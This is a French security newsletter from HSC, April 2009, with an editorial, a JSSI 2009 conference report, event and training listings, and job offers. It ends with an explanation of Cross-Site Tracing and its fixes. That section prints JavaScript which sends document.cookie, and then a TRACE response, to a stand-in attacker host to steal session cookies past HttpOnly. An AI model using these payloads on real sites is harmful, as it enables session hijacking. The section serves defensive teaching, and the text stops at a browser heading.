[Newsletter HSC] N°56 - Avril 2009
Newsletter d'information de HSC
newsletter at hsc-news.com
Mer 1 Avr 17:30:28 CEST 2009
========================================================================
HSC Newsletter -- N°056 -- avril 2009
========================================================================
"Petit poisson deviendra grand."
[Jean de La Fontaine]
--[ Sommaire ]----------------------------------------------------------
1. Editorial
2. Le saviez-vous ? La question
3. Compte-rendu de la JSSI 2009
4. Elisabeth Manca rejoint HSC
5. 4ème édition de la journée 01 DSI sur la sécurité
6. Prix de l'Innovation des Assises de la Sécurité
7. Nouveautés du web HSC
8. Agenda des interventions publiques
9. Veille en vulnérabilités HSC
10. Prochaines formations HSC
11. Offres d'emploi, 6 postes à pourvoir !
12. Actualité des associations : Club 27001, OSSIR et Club PCA
13. Le saviez vous ? La réponse
--[ 1. Editorial - Hervé Schauer ]--------------------------------------
Depuis quelques années, certains acteurs de notre métier tendent
à élargir leur sphère d'influence en renommant leur fonction "sécurité
de l'information" et non plus "sécurité des systèmes d'information". Par
exemple le Clusif n'est plus le club de la sécurité des systèmes
d'information, mais le club de la sécurité de l'information, ce qui fait
passer au second plan la sécurité informatique. La norme ISO 27001 nous
décrit la construction d'un SMSI : Système de Management de la Sécurité
de l'Information (ISMS en anglais), pas sécurité des systèmes d'information.
Est-ce anodin ? Est-ce que les RSSI doivent suivre cette mode et devenir
des RSI, Responsables de la Sécurité de l'Information ?
Une entreprise concurrente propose des postes alléchants aux salariés
de l'entreprise, pour les avoir en entretien, les faire parler et tout
savoir des projets de votre entreprise. C'est de la sécurité de
l'information. Est-ce que l'on gagne vraiment à ne pas demander aux
ressources humaines de se charger du problème ? Ou au responsable de
l'intelligence économique ?
Un groupe de consommateurs dénigre vos produits sur la toile et le
marketing viral qui en découle est dévastateur. C'est de la sécurité de
l'information. Est-ce que l'on gagne vraiment à lutter contre le dénigrement
sur internet à la place du département marketing ?
Bien sûr, le RSSI doit s'attacher à la sécurité de l'information quand
elle transite par le répondeur d'un téléphone sur IP, quand elle est oubliée
sur une clef USB égarée ou qu'elle se trouve sur un papier qui traîne sur un
bureau en accès libre. Mais ça, c'est justement l'information dans les systèmes
d'information et la sempiternelle sensibilisation comme mesure de sécurité. Et
cela ne doit pas faire oublier les dispositifs techniques et informatiques qui
demeurent au coeur des mesures de sécurité et qui doivent être compris et
maîtrisés par les RSSI, de même que les problématiques modernes : ubiquité
personnel/professionnel, dépérimétrisation, virtualisation, etc.
En ces temps de crise, les RSSI ont sans doute intérêt à ne pas prendre
les responsabilités des autres et à rester centrés sur leur métier :
construire et faire vivre un Système de Management de la Sécurité des
Systèmes d'Information et mettre en oeuvre une SSI par la gestion des risques.
--[ 2. Le saviez vous ? La question ]-----------------------------------
La méthode TRACE est souvent montrée du doigt par les scanners de
vulnérabilités automatisés.
Savez-vous d'où provient sa mauvaise réputation ?
--[ 3. Compte-rendu de la JSSI 2009 ]-----------------------------------
par Christophe Alladoum et Yves Le Provost
Le thème de la JSSI 2009 qui s'est déroulée à Paris le 17 mars dernier
était "Les nouveaux visages de l'insécurité informatique".
* Malware sur Second Life, mythe ou réalité ? - François Paget (McAfee)
Second Life génère un grand nombre de transactions financières, ce qui ne
manque pas d'intéresser un nombre important de personnes malveillantes. Tel
est le constat effectué par François Paget qui s'est donc intéressé aux
différentes formes de vulnérabilités potentiellement exploitables dans
l'univers virtuel. Il a donc exposé les différentes méthodes pouvant être
utilisées à des fins d'enrichissement, de malveillance, de spam, etc.
La première étape a été de créer un ver spammeur. Le principe est de
dupliquer un objet, de lui attacher des propriétés qui sont en réalité des
éléments d'un mail, et de lui faire envoyer ces mails. Le but est ensuite
de redistribuer cet objet à un maximum de personnes pour démultiplier
l'action. Pour ce faire, et surtout pour contourner les limitations
imposées par l'éditeur de Second Life, il utilise le multi-threading. Son
avantage est de pouvoir passer outre le temps d'attente imposé entre chaque
envoi de mail. Chaque mail est lancé dans un nouveau thread, et seul ce
thread est limité. Pour contourner les limitations liées aux nombres
d'objets dupliqués, il utilise des timers qui permettent de rester dans les
normes autorisées. Ce ver peut être ensuite aisément modifié pour
effectuer d'autres actions et ainsi pouvoir être utilisé dans des attaques
de type DDoS.
L'étape suivante était l'utilisation de ces éléments pour tenter d'infecter
n'importe quel objet (transformation en virus). Si ceci est effectivement
possible, une protection la rend plus complexe : un script dupliqué doit
ensuite être activé par son propriétaire, rendant nécessaire la mise en
place d'un scénario pour l'y inciter.
Les dernières étapes ont été d'utiliser le logiciel CopyBot pour cloner des
objets, des apparences et des avatars, et ensuite de mener des attaques de
type phishing. Celles-ci consistent à faire accepter à une autre personne
un objet qui le rendra riche en compensation d'un Linden Dollar. En cas
d'utilisation, la victime se verra vider son compte en banque Second Life.
* Les enjeux de l'e-reputation - Stéphane Koch (intelligentzia.net)
Stéphane Koch nous expose les problématiques de la réputation sur
Internet en surfant sur la tendance Web 2.0... Il introduit en découpant
l'e-réputation selon les facteurs humains et technologiques et leurs
conséquences sur la diffusion de l'information. Pour le facteur humain, on
peut notamment placer la diffusion de l'information à plusieurs niveaux de
la pyramide de Maslow : besoins d'épanouissement, besoins d'estime, besoins
d'appartenance à un groupe. Il détaille ensuite la relation employé /
entreprise et son impact sur les ressentiments humains. Il nous montre
enfin divers exemples de diffusions non contrôlées de situations gênantes
sur des blogs ou des réseaux sociaux.
La deuxième partie concerne plus spécifiquement la diffusion non
souhaitée d'informations de toutes natures (base de données clients, vol
d'identité...) et par tous les moyens (copie de disques durs, Bumping Key,
etc.) et leurs conséquences en terme d'image ou de pertes financières.
* Filtrer et loguer, yes we can ! - Eric Barbry (Cabinet Alain Bensoussan)
La présentation effectuée par Eric Barby nous administre une piqûre de
rappel sur l'état de la législation propre à l'informatique et aux
télécommunications. D'un point de vue "état des lois", c'est toujours le
flou : pas de loi dédiée, décret d'application tardant à venir, etc. Une
nouveauté tout de même, provenant d'une jurisprudence du TGI de Paris,
datant du 5 mars 2009, qui juge que l'adresse IP permet de certifier de
façon certaine de l'identité d'une personne. Cela illustre parfaitement le
fossé existant entre la vision juridique et la vision technique.
Cette différence de vues se retrouve également dans les différents
éléments qui pourraient servir de preuve, notamment la question de la
journalisation : constitue-t-elle une preuve irréfutable ? Dans la pratique
il est aisé de la décrédibiliser. C'est pourtant une obligation légale pour
les prestataires de télécommunication et un principe de précaution pour
toute entité fournissant un accès internet (voir la jurisprudence BNP qui
considère que nous sommes tous des FAI). Dans ce cadre là, il est rappelé
qu'une erreur est souvent faite concernant la position de la CNIL : une
rumeur persistante voudrait que la CNIL n'autorise pas la journalisation
et le filtrage. Le guide pratique émis par la CNIL "pour les employeurs et
les salariés" est clair en ce sens : il est légitime d'utiliser des filtres
et de journaliser !
Dans l'avenir, il convient de suivre les évolutions juridiques :
jurisprudences nouvelles, décret d'application (LCEN ?), droit
spécifique...
* Quels sont les nouveaux visages de l'insécurité informatique ? - Table
ronde animée par Hervé Schauer (HSC)
Cette table ronde a réuni Pierre Blanchier (RSSI de Boursorama), Laurent
Penou (gadz.org, association des anciens des Arts et Métiers), Eric Barbry
(Cabinet Alain Bensoussan), François Paget (Mac Afee) et Stéphane Koch
(Intelligentzia.net).
Pierre Blanchier évoque "l'âge d'or de la clé USB" en prenant
notamment comme exemple le cas du ver Conficker, le problème du vol de
clé et des transmissions de contenu par clé USB. Il alerte également sur
la facilité avec laquelle il est possible actuellement de filmer diverses
évènements avec n'importe quel téléphone portable (mot de passe lors d'un
déverrouillage de session, ...).
Laurent Penou témoigne du travail de sensibilisation effectué auprès
des différents utilisateurs : diffusion de données personnelles, annuaires
professionnels, etc.
Hervé Schauer lance un débat juridique sur l'obligation faite à certains
employés de contrôler leur "façade" sur internet.
* Virtualisation et sécurité - Nicolas Ruff (EADS)
Nicolas Ruff a présenté sa conférence autour de la thématique de la
sécurité pour les environnements virtualisés. Un rappel succint du concept
de virtualisation a d'abord été entrepris, sur les différents types de
virtualisation, et les grands noms de la virtualisation aujourd'hui :
VMWare, Microsoft, Sun et Citrix/Xen.
D'un point de vue sécurité, la virtualisation possède des avantages,
notamment de par l'isolation entre système hôte et invité, mais également
par la disponibilité d'un service fourni par une machine virtuelle : si la
machine est compromise, la remplacer est très aisée. Mais, elle apporte
aussi des inconvénients, car le système hôte joue le rôle de goulot
d'étranglement, et s'il devient indisponible, c'est l'ensemble des services
virtualisés qui l'est aussi. Il s'est également interrogé sur la
possibilité d'une compromission du système hôte, si le système invité
l'est, en se référant aux travaux de Joanna Rutkowska. En bref, la
virtualisation ne va pas apporter un meilleur niveau de sécurité. Elle
nécessite une administration spécifique et tend à proposer de plus en plus
de fonctionnalités (antivirus !) et ainsi de plus en plus de failles
potentielles.
* La sécurité des plates-formes ASP / SAAS - Yann Allain (Opale Security)
La deuxième conférence de l'après midi fut présentée par Yann Allain
qui a développé le sujet de "la conciliation des objectifs de sécurité
des sociétés clientes et des offreurs" par l'intégration de
plates-formes "Application Service Provider" (ASP), et "Software As A
Service" (SaaS).
Il s'agit concrètement de l'externalisation des services dont une
société a besoin. Pour chaque service, elle fera appel à une société
tierce, qui peut aussi faire appel à une autre société, etc. L'impact
en terme de sécurité devient vite évident : l'entreprise exploite des
informations d'une boite noire, dont elle ignore le fonctionnement, et
donc les faiblesses. Des standards ont donc émergé dans le but
d'homogénéiser les exigences sécurité des services, et des
certifications pour valider leur application. Les vulnérabilités des
SaaS sont essentiellement applicatives, mais leur impact peut être
critique. Il a conclu sur le fait qu'il serait donc recommandable
d'inclure à plus grande échelle les SaaS dans le bugdet "Sécurité"
d'une entreprise.
* Les rootkits navigateurs - Christophe Devaux et Julien Lenoir (ESEC)
L'exploitation des rootkits dans les navigateurs était le sujet de
la conférence suivante, menée par Christophe Devaux et Julien
Lenoir. Ils basent leur idée d'inclure des rootkits au sein des
navigateurs web sur le fait qu'aujourd'hui, ils sont le biais idéal
pour voler des informations sensibles d'un utilisateur outrepassant
les mécanismes de sécurité comme HTTPS.
La démarche d'infection se passe en trois temps :
- l'installation du rootkit, qui peut être manuelle, via un vecteur
d'infection (virus), ou en exploitant une faille de l'explorateur ;
- la dissimulation du rootkit, soit en la supprimant de la vue de
l'utilisateur, ou bien en infectant un autre plugin installé ;
- la possibilité d'interaction avec ce rootkit, passant par exemple
des appels AJAX.
Preuve de concept à l'appui, ils ont présenté différents rootkits
"faits maison", contruits pour IE et Firefox, mettant l'accent sur les
informations qui peuvent être subtilisées à la victime.
* Les fonctions de hachage, un domaine à la mode - Thomas Peyrin
(Ingenico)
La dernière conférence de cette 8ème JSSI portait sur l'utilisation
des fonctions de hachage pour la sécurité. Thomas Peyrin est dans un
premier temps revenu sur les bases mathématiques derrière les
fonctions de hash. Comme elles servent à garantir l'intégrité et
l'unicité d'un message, il est essentiel que ce mécanisme soit
fiable. Cette fiabilité doit provenir le fait que pour un message,
hashé, il ne peut être possible de trouver en un temps raisonnable
un autre message tel que leurs condensats soient égaux.
Passant en revue les "grands" algorithmes de hachage, il a indiqué
pour chacun les dates de leurs premières attaques, et la date où ils
furent cassés (ie. une seconde pré-image a été générée), pour arriver
à l'utilisation de MD5, très employé pour l'intégrité des certificats
SSL, jugé cassable depuis 2005. Il a récemment été cassé, par des
chercheurs qui sont parvenus à générer un «faux» certificat SSL valide.
SHA-1 est jugé cassable, et potentiellement SHA-2 aussi, puisque ce
dernier est construit selon le même schéma algorithmique, d'où le
concours SHA-3, actuellement en cours au NIST, espérant qu'il comble
les "faiblesses" des versions précédentes.
--[ 4. Elisabeth Manca rejoint HSC ]------------------------------------
Afin de consolider l'équipe menant les missions de conseil, d'audit
et d'accompagnement dans les prestations organisationnelles en sécurité,
Elisabeth Manca a rejoint HSC. Ingénieur depuis 1995, elle a débuté
sa carrière chez Thalès dans la structure infogérance au sein d'une équipe
opérationnelle. Elle mène en 2000 ses premières missions de consultant
en sécurité des systèmes d'information, rejoint l'agence de Telindus
Méditerranée en 2001 puis est nommée au Centre de Compétences National
Sécurité et coopère à la définition de la stratégie pour l'offre de service.
Elisabeth Manca a travaillé sur des projets couvrant tous les aspects
de la SSI : politiques de sécurité, appréciation des risques, déploiement
d'infrastructures et de dispositifs de sécurité, audits, etc. Chez HSC elle
participera notamment au développement des prestations autour des normes
de la série ISO 27001.
--[ 5. 4ème édition de la journée 01 sur la sécurité ]------------------
HSC est partenaire de la 4ème édition de la journée 01 DSI sur la
sécurité qui se déroulera au Pavillon Kléber à Paris le mercredi 29 avril
2009 : "Security Management 2009".
Programme en cours d'achèvement :
8h30 : Accueil
9h00 : Ouverture, panorama 2008 des failles et menaces
Yvon Klein, directeur technique du CERT-IST, ancien RSSI du CNES
9h20 : Etude Clusif : "La malveillance téléphonique"
Benoit Le Mintier et Jean-Marc Gremy, experts du Clusif
9h40 : Table ronde "Faire face aux risques"
Emmanuel Garnier, RSSI de Systalians (Réunica-Bayard)
Jean-Marie Groppo, expert sécurité et conformité, RSA Security
Philippe Rondel, directeur Technique France, CheckPoint
10h25 : "Explosion des échanges numériques, menace ou opportunité ?"
Taher Elgamal, expert sécurité, Axway
11h00 : Table ronde "Management de la continuité d'activité"
Nicolas de Thore, IBM
Zbigniew Kostur, RSSI de Nexans
Lionel Pelletier, Colt
François Tête, président du Club de la Continuité d'Activité
11h30 : Table ronde "Mise en place d'un Plan de secours informatique"
Annie Butel, responsable PCA de la fonction finances, BNP PARIBAS
Olivier Cohen, Double Take Software
Jean-Pierre Gardille, directeur marketing virtualisation, Orange
Business Services
Eric Milton, Amaïs
Xavier Poinsignon, Completel
12h00 : Management de la sécurité en entreprise
Olivier Iteanu, Avocat
12h15 : Remise des prix RSSI durant le déjeuner
Le jury est composé de :
Gilles Cornillière, Capgemini
Eric Domage, Research Manager, IDC Europe
Christophe Elise, journaliste
Elisabeth Manca, HSC (Hervé Schauer Consultants)
Serge Saghroune, RSSI, Accor
13h45 : "Infogérance, ASP, off shore, le SI s'ouvre aux menaces"
Hervé Guesdon, Ubiqube
Frank Pharose, Completel
14h00 : L'etude Business Resilience
Jérôme Clauzure, délégué général de l'AFUTT
14h15 : Table ronde "Nouveaux outils de communications, menaces multipliées ?"
Said El Ketrani, Ilexia
Bruno Hamon, Lexsi
Jean-Francois Tessereaud, RSSI, EADS ITS
15h00 : "Lutter contre la fuite des données"
Bernard Montel, Directeur Technique, RSA Security
15h30 : "Sécurité, un poste budgétaire atypique ?"
Jean-Michel Craye, directeur marketing sécurité, Orange Business
Services
15h45 : Table ronde "L'évolution du métier de RSSI"
Cedric Foll, RSSI, Ministère de l'Education Nationale
16h15 : Conclusion de la journée
Hervé Schauer, HSC
Entrée libre, inscription préalable obligatoire en allant sur :
http://www.01net.com/journees01/secu2009/secu2009.php?prov=hsc
--[ 6. Prix de l'Innovation des Assises de la Sécurité ]----------------
Il ne vous reste plus que 2 mois pour candidater au Prix de
l'Innovation des Assises de la Sécurité ! Vous avez créé votre société,
vous avez un projet innovant en sécurité, profitez de cette opportunité
unique de vous faire connaître auprès de toute la profession !
Le Prix de l'Innovation des Assises de la Sécurité sera décerné pour
la 4ème année consécutive à Monaco du 7 au 10 octobre 2009.
Le comité de sélection du Prix 2009 est composé de :
Hervé Schauer, HSC, animateur du comité de sélection
Didier Gras, RSSI Groupe BNP Paribas, co-animateur
Jean Capron, RSSI France, Philips
David Crochemore, FSSI, Ministère de la Justice
Yvon Klein, ancien RSSI du CNES
Thierry Olivier, Responsable Sécurité du SI, SFR
Benoît Perrot, Directeur d'investissement, ACE Management
Sylvain Thiry, RSSI Groupe SNCF
Alexandre Zapolski, CEO Linagora
Réda Zitouni, CEO Mobiquant (société lauréate en 2008)
Ce prix permet à une entreprise innovante dans le domaine de la
sécurité des systèmes d'information de bénéficier d'un accès gratuit aux
Assises de la Sécurité. Elle bénéficiera d'un espace d'exposition et d'un
atelier afin de démontrer son produit ou son service. Elle recevra son prix
en séance plénière le vendredi 9 octobre 2009, en présence de la presse
et des médias.
Les critères utilisés par le comité de sélection sont notamment :
- Le caractère innovant et nouveau de la solution présentée
- Les innovations technologiques de la solution
- L'intérêt pour les RSSI et métiers associés
- L'état d'avancement du projet
Le règlement complet et le dossier de candidature sont disponibles
en téléchargement sur le site des Assises, rubrique Prix de l'Innovation :
http://www.lesassisesdelasecurite.com/accueil/prix.aspx
ou le site du Cercle de la Securite : http://www.lecercle.biz/home/prix.aspx
Le dossier complet doit être envoyé sous format électronique avant le
30 mai 2009 à l'adresse prixinnovation at lesassisesdelasecurite.com.
N'hésitez pas à renvoyer cette annonce et à faire part de votre intérêt
à candidater auprès d'Hervé Schauer ou de Didier Gras.
--[ 7. Nouveautés du web HSC ]------------------------------------------
- Présentation "Virtualisation et sécurité" par Alain Thivillon
http://www.hsc.fr/ressources/presentations/cio-virtualisation/
- Article "Certifications ISO 27001 pour les individus" par Hervé Schauer
publié dans Hakin9 n°2 de février 2009
http://www.hsc.fr/presse/HS_certifications27001_hakin9.pdf
--[ 8. Agenda des interventions publiques ]-----------------------------
- 29 avril 2009 : 4ème édition de la journée 01 sur la sécurité - Paris
Conclusion de la journée - Hervé Schauer
http://www.01net.com/journees01/secu2009
- 12 mai 2009 : Conférence Netfocus organisée par Baptie - Bruxelles
"La gestion des risques selon la méthode ISO 27005" - Hervé Schauer
https://www.baptie.com/events/show.asp?e=206
- 4 juin 2009 : SSTIC 2009 - Rennes
Conférence invitée : "La norme ISO 27001" - Alexandre Fernandez-Toro
http://www.sstic.org/SSTIC09/programme.do
- 9 juin 2009 : Conference du CERT-IST - Paris
Participation à la table-ronde "Dépérimétrisation et cloud computing" -
Hervé Schauer
- 11 juin 2009 : Conférence EFE pour l'industrie pharmaceutique
"Sécurité de l'information" - Hervé Schauer
- 12 juin 2009 : Clusir Aquitaine - Pau
"La norme de gestion de risques en sécurité de l'information ISO 27005" -
Hervé Schauer
http://www.clusir-aquitaine.fr/
Retrouvez l'agenda de nos interventions publiques sur
http://www.hsc.fr/conferences/agenda.html.fr
--[ 9. Veille en vulnérabilités HSC ]-----------------------------------
1408 11-03-2009 Multiples vulnérabilités dans Microsoft Windows
1409 12-03-2009 Déni de service SIP dans Asterisk
1410 25-03-2009 Vulnérabilités critiques dans Adobe Acrobat et Adobe Reader
1411 26-03-2009 Multiples vulnérabilités dans Cisco IOS
1412 27-03-2009 Vulnérabilités multiples dans le plug-in Java
--[ 10. Prochaines formations HSC ]-------------------------------------
Nos prochaines formations sont les suivantes :
- Paris
ISO 27001 Lead Implementer .......... : 6 au 10 avril
ISO 27001 Lead Auditor .............. : 20 au 24 avril
Indicateurs et tableaux de bord SSI ... : 24 avril
L'essentiel de l'ISO 27001 .......... : 27 et 28 avril
Gestion des mesures de sécurité ISO 27002 : 29 et 30 avril
L'essentiel de PCI-DSS .............. : 25 mai
ISO 27005 Risk Manager .............. : 2 au 4 juin
ISO 27001 Lead Implementer .......... : 8 au 12 juin
ISO 27001 Lead Auditor .............. : 15 au 19 juin
Réalisation pratique des Tests d'Intrusion : 22 au 26 juin (*)
ISO 27001 Lead Auditor .............. : 6 au 10 juillet
Fondamentaux techniques de la SSI ... : 14 et 15 septembre
Gestion des identités et des accès .. : 16 au 18 septembre
ISO 27005 Risk Manager .............. : 28 au 39 septembre
DNS par la pratique .................. : 26 octobre (*)
Postfix par la pratique ............. : 27 octobre (*)
Lutte contre le spam par la pratique . : 28 octobre (*)
Fonctionnement des PKI ............... : 29 octobre
Sécurité de la VoIP .................. : 30 octobre
Sécurité des serveurs et applications web : 5 et 6 novembre
Sécurité du WiFi et des réseaux sans-fil : 18 novembre
(*) : formations pratiques avec un ordinateur par stagiaire
- Genève (Suisse)
ISO 27001 Lead Implementer .......... : 4 au 8 mai
ISO 27001 Lead Auditor .............. : 9 au 13 novembre
- Luxembourg
ISO 27001 Lead Auditor .............. : 25 au 29 mai
ISO 27005 Risk Manager .............. : 24 au 26 juin
ISO 27001 Lead Implementer .......... : 12 au 16 octobre
- Lyon
ISO 27005 Risk Manager .............. : 22 au 24 avril
ISO 27001 Lead Implementer ........... : 22 au 26 juin
- Nice
ISO 27001 Lead Implementer .......... : 29 juin au 3 juillet
- Strasbourg
ISO 27001 Lead Implementer .......... : février 2010
- Toulouse
ISO 27005 Information Security Risk Manager : 13 au 15 mai
ISO 27001 Lead Auditor .............. : mars 2010
Pour tout renseignement, et pour vous inscrire pour toutes les villes
sauf Luxembourg, contactez Lynda Benchikh :
formations at hsc.fr -- +33 141 409 704
Pour les formations à Luxembourg contactez Sylvie Favaut :
Sylvie.Favaut at eu.didata.com
Tél : +352 25 48 25 321 -- GSM : +352 621 31 20 88 -- Fax : +352 25 48 30
Rappel : pour 4 jours de formation consécutifs commandés
simultanément par la même personne, le 5ème jour est offert (sauf
formations d'une semaine et certifiantes).
Vous souhaitez des formations dans votre ville ? Contactez Hervé Schauer.
Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
notre catalogue sur http://www.hsc.fr/services/formations/index.html.fr
--[ 11. Offres d'emplois ]----------------------------------------------
HSC recherche :
- Deux consultants débutants intéressés par la sécurité autour des normes
ISO 27001
- Un(e) consultant(e) expérimenté(e) sur l'organisation de la sécurité afin
de piloter des missions auprès de grands comptes
- Un administrateur système et réseau, webmestre et logisticien
Au delà de ces recherches actives, tous les autres profils sont
invités à faire des candidatures spontanées. HSC recrute réellement.
Les postes sont basés à Levallois-Perret, à 5 minutes de la gare de
Paris Saint-Lazare, dans 400m2 de bureaux climatisés.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Les consultants ISO 27001 réaliseront des prestations de conseil,
d'expertise, d'audit, d'accompagnement et de formation en sécurité,
typiquement dans la mise en oeuvre et l'audit de SMSI, la gestion de
risque en sécurité de l'information, et de manière plus générale tout
ce qui touche à l'organisation de la SSI.
HSC propose un programme de 3 à 8 semaines de formations accessible à
tous les nouveaux embauchés, permettant un apprentissage sans équivalent
par des experts de chaque domaine.
L'équipe est jeune et dynamique mais aussi expérimentée, et se caractérise
également par son éthique et son indépendance qui lui donne une richesse
unique depuis 20 ans.
HSC propose des salaires très motivants, et permet des augmentations de
salaire rapides, fréquentes, et conséquentes. Diverses primes sont
également en usage. Chaque consultant qui fait ses preuves est réellement
reconnu rapidement.
Lorsqu'ils quittent HSC, en moyenne après 6 ans, les consultants évoluent
dans leur carrière, principalement au sein d'éditeurs en sécurité, de
multinationales en informatique et d'opérateurs de télécommunication,
partent au service de l'état (SGDN, Défense, etc), ou deviennent RSSI dans
un grand compte. Les carrières des anciens consultants passés chez
HSC depuis 20 ans vous le démontrent.
Les candidats devront avoir un bon contact humain, une bonne qualité de
rédaction en français, et une maîtrise de l'informatique et des technologies.
Si vous souhaitez proposer votre candidature, nous vous remercions d'envoyer
votre CV en format texte ascii par courrier électronique à cv at hsc.fr.
Pour plus d'informations : http://www.hsc.fr/societe/recrutement.html.fr
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
HSC recherche un administrateur système et réseau, de formation BTS
ou IUT, qui soit autonome, capable de prendre des décisions rapidement en
fonction des besoins, qui sache analyser les journaux système et réseau,
ayant de très bonnes compétences système Windows, et la connaissance de
Linux ou un autre Unix (Solaris, AIX, etc), et la maîtrise des routeurs
CISCO. Une compétence dans les produits VMware et Asterisk (VoIP) sera un
plus.
Les tâches attribuées à ce poste seront de veiller au bon fonctionnement de
toute l'infrastructure (réseau, serveurs, sécurité périmétrique), de gérer
les sauvegardes, de veiller à la sécurité des équipements internes et
périmétriques, de gérer le web interne et le web externe. Cette dernière
tâche sera importante et une connaissance du langage WML (Website Meta
Language) sera un plus (http://www.thewml.org/).
Il sera responsable de la logistique et des moyens généraux, et préparera
les salles de travaux pratiques (postes clients et infrastructure).
Si vous souhaitez proposer votre candidature, nous vous remercions d'envoyer
votre CV en format texte ascii par courrier électronique à cv-admin at hsc.fr.
--[ 12. Actualité des associations : Club 27001, OSSIR et Club PCA ]----
o Club 27001 (http://www.club-27001.fr/)
. La présentation du CRPHT (Henri Tudor) et le compte-rendu de la
réunion du jeudi 19 mars à Paris sont en ligne sur :
http://www.club-27001.fr/precedentes-reunions/precedentes-reunions-paris.html
. Prochaines réunions à Paris les jeudis 28 mai, 17 septembre et
19 novembre 2009
Les animateurs sont en attentes de propositions de présentations.
. Prochaine réunion à Toulouse vendredi 24 avril à la CNAMTS
- "Gouvernance et pilotage de la sécurité de l'information"
par Pierre de Thomasson (Hapsis)
- "ITILv3 et ISO27001" par Liliane Thonon (Alcatel) et
Nicole Genotelle (Atos)
o OSSIR (http://www.ossir.org/)
. Prochaine réunion à Paris le mardi 7 avril à 14h00
En raison de la longueur exceptionelle de la présentation prévue,
cette réunion n'aura qu'une seule présentation :
- Le passeport biométrique, présentation technique
par Benoît Leger et Nicolas Chalanset (Stelau Conseil)
. Prochaine réunion à Rennes le 23 avril
- "DNSSEC" par Francis Dupont (ISC)
. Première réunion à Lyon le jeudi 9 avril à 14h00 à l'UMGR
- "Présentation de l'OSSIR et compte-rendu de la JSSI"
par Bertrand Arquillière (Steria) et Gaetan Dubost (SNCF),
animateurs du groupe OSSIR Rhone-Alpes
- "Mobilité et protection des données confidentielles"
par Fabrice Mourron et Julien Cayssol (Certilience)
o CCA (http://www.clubpca.eu/)
. Assemblée générale le 26 mai à l'OCDE
--[ 13. Le saviez-vous ? La réponse ]------------------------------------
Pour comprendre les problèmes relatifs à la méthode TRACE, il est
nécessaire d'effectuer un rapide rappel sur les XSS.
Les XSS
-------
Un XSS est une faille de sécurité dans une application Web, qui permet
à un attaquant de faire exécuter du code (HTML, JavaScript...) au visiteur
de la page. La première chose venant à l'esprit est de chercher à obtenir
l'identifiant de session du visiteur (le cookie), en espérant que ce
visiteur soit authentifié.
Une façon de faire est, par exemple, d'inclure le code suivant :
<script>
document.write('<img src="http://site-de-l-attaquant.com/?cookie=' +
document.cookie + '" />');
</script>
Pour plus de détails sur les XSS, voir [XSS].
Une protection...
-----------------
Pour se protéger des XSS, Microsoft a eu idée d'introduire à partir de
MS IE 6 SP1 un nouvel attribut pour les cookies : HttpOnly [MSHttpOnly].
Si cette méthode est appliquée sur un cookie, ce dernier sera inaccessible
en JavaScript (dans un navigateur compatible). Par exemple :
Set-Cookie: SECRETSESSIONID=Y2VsdWktY2kgbmUgc2VyYSBwYXMgY29tcHTDqSA6IElTTyAyNzAwMQ==; httponly
La valeur du cookie ne peut alors pas être transmise à un tiers en
utilisant les méthodes de manipulation des cookies telles que
'document.cookie'.
...et un contournement
----------------------
Il existe cependant une autre façon d'avoir accès à ce cookie : en
utilisant de façon combinée l'objet JavaScript XMLHttpRequest et la méthode
TRACE. L'object XMLHttpRequest permet d'effectuer des requêtes asynchrones
au site hébergeant le script à l'aide de n'importe quelle méthode HTTP.
Un serveur recevant une requête utilisant la méthode TRACE renvoie dans
le corps de sa réponse l'intégralité de la requête effectuée par le client :
TRACE / HTTP/1.0
Cookie: SECRETSESSIONID=Y2VsdWktY2kgbmUgc2VyYSBwYXMgY29tcHTDqSA6IElTTyAyNzAwMQ==; httponly
HSC: Bonjour !
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2009 16:25:03 GMT
Server: Apache
Connection: close
Content-Type: message/http
TRACE / HTTP/1.0
Cookie: SECRETSESSIONID=Y2VsdWktY2kgbmUgc2VyYSBwYXMgY29tcHTDqSA6IElTTyAyNzAwMQ==; httponly
HSC: Bonjour !
Le cookie est bien affiché à nouveau. La réponse est alors accessible en
JavaScript :
xhr.open('TRACE', '/', false);
xhr.send(null);
document.write('<img src="http://site-de-l-attaquant.com/?traceresponse=' +
xhr.responseText + '" />');
Ce qui permet de s'affranchir de la restriction httponly !
Ce contournement a été baptisé le Cross-Site Tracing [XST] et a donné
suite à plusieurs parades.
La résolution
=============
Côté serveur
------------
Interdire la méthode TRACE dans les requêtes supportées par le serveur.
Par exemple, dans Apache, en utilisant :
<LimitExcept GET POST>
Deny from all
</LimitExcept>
Ou depuis les versions 1.3.34 et 2.0.55 de Apache, en mettant la directive
TraceEnable à off dans httpd.conf [Apache2].
Une autre méthode couramment utilisée consiste à utiliser mod_rewrite :
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
Côté clients
------------
Coté client, les éditeurs de navigateurs ont peu à peu tous interdit
l'utilisation de la méthode TRACE dans les requêtes effectuées à l'aide de
l'objet XMLHttpRequest.
Firefox
'''''''
La méthode TRACE a été interdite en dur dans le code :
Dans le fichier : ./content/base/src/nsXMLHttpRequest.cpp
// Disallow HTTP/1.1 TRACE method (see bug 302489)
// and MS IIS equivalent TRACK (see bug 381264)
if (method.LowerCaseEqualsLiteral("trace") ||
method.LowerCaseEqualsLiteral("track")) {
return NS_ERROR_INVALID_ARG;
}
Internet Explorer
'''''''''''''''''
MSIE 6.0 SP0 : pas de HttpOnly.
MSIE 6.0 SP1 : première implémentation
Safari
''''''
Avec la version 3.2.2 :
"Error: Permission denied"
Cette version ne prend pas en compte l'attribut HttpOnly : l'interdiction
de la méthode TRACE est inutile, puisque JavaScript peut toujours accéder
aux cookies !
Avec la version 4, l'erreur JavaScript suivante est générée :
Error: SECURITY_ERR: DOM Exception 18
Et Safari 4 prend enfin en compte l'attribut HttpOnly !
Chez Apple, la parade aura été implémentée avant la protection.
Opéra
'''''
Ce test a été effectué avec Opéra 9.64.
La méthode TRACE n'est pas interdite... mais est transformée en GET sans
aucun avertissement.
4 0.036573 10.7.1.8 -> 10.7.1.0 HTTP GET /~aviat/test-trace.php HTTP/1.1
6 0.038277 10.7.1.0 -> 10.7.1.8 HTTP HTTP/1.1 200 OK (text/html)
8 0.062625 10.7.1.8 -> 10.7.1.0 HTTP GET / HTTP/1.1
9 0.063469 10.7.1.0 -> 10.7.1.8 HTTP HTTP/1.1 304 Not Modified
Chromium
''''''''
